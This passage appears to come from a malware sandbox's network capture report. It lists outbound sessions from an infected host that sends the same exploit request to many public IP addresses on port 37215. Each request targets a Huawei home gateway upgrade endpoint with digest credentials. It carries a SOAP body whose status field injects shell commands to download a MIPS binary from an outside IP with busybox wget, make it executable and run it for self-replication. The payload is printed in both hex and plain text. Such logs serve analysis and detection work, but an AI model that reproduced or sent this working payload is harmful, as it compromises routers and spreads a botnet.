                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1461192.168.2.2336740157.84.94.18337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537473917 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1462192.168.2.2355974157.168.156.2137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537473917 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1463192.168.2.234708041.63.254.8237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537491083 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1464192.168.2.233624441.136.108.8937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537497997 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1465192.168.2.235838659.22.26.9237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537630081 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1466192.168.2.2342386157.78.12.22237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537715912 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1467192.168.2.2349230150.23.255.13437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542566061 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1468192.168.2.2336050197.65.225.1737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542566061 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1469192.168.2.234664641.146.126.9737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542572021 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1470192.168.2.2355540191.189.180.20037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542579889 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
